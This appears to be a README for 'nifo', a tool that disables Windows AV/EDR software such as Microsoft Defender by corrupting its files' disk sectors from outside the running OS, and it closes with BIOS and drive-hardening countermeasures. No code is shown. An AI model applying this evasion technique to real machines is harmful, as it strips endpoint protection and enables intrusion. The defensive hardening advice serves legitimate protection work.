NIFO: remove AV/EDR with physical access
Nuke It From Orbit
With the precision of a brain surgeon wielding a chainsaw, nifo can obliterate most AV/EDR products from endpoints or servers running the world’s most popular operating system, even if they’re BitLocker-protected. This requires only unprivileged user access to Windows and physical access to the device without proper BIOS hardening (see list of BIOS settings that prevent this at the end of document)
How does it work?
Since security on Windows is an afterthought, the operating system can manage quite fine without any AV/EDR software installed. So if you want to disable AV/EDR, it’s just a question of breaking it enough for it not to start up.
While protections might be in place to prevent you from tampering directly with registry keys or files from inside the OS, nifo takes the direct approach and overwrites the first bytes of the target files while the operating system is not running – either by booting to Linux via USB or removing the harddrive and putting it in another system to do the same modifications.
By identifying the physical sector locations of essential AV/EDR files, we can overwrite these sectors from outside the Windows OS where no protections exist. It makes no difference if the machine is BitLocker protected or not, since the task is not to write anything particular, just to corrupt the files enough for them not to load when booting. Nifty, I might say.
Supported (LOL) AV/EDR products
- Microsoft Defender
It’s easy to plug in more products as a detector in the code – pull requests for others are welcome, if you have the paths to look for the executables and drivers. It’s beyond me to do this for every single product out there.
Protecting yourself from this
- Secure BIOS/UEFI settings with a password
- Secure harddrive/SSD data with BitLocker (otherwise you could just scan the drive for the sectors)
- Secure harddrive/SSD from foreign modifications with harddrive password
- Disallow booting off anything but the harddrive.
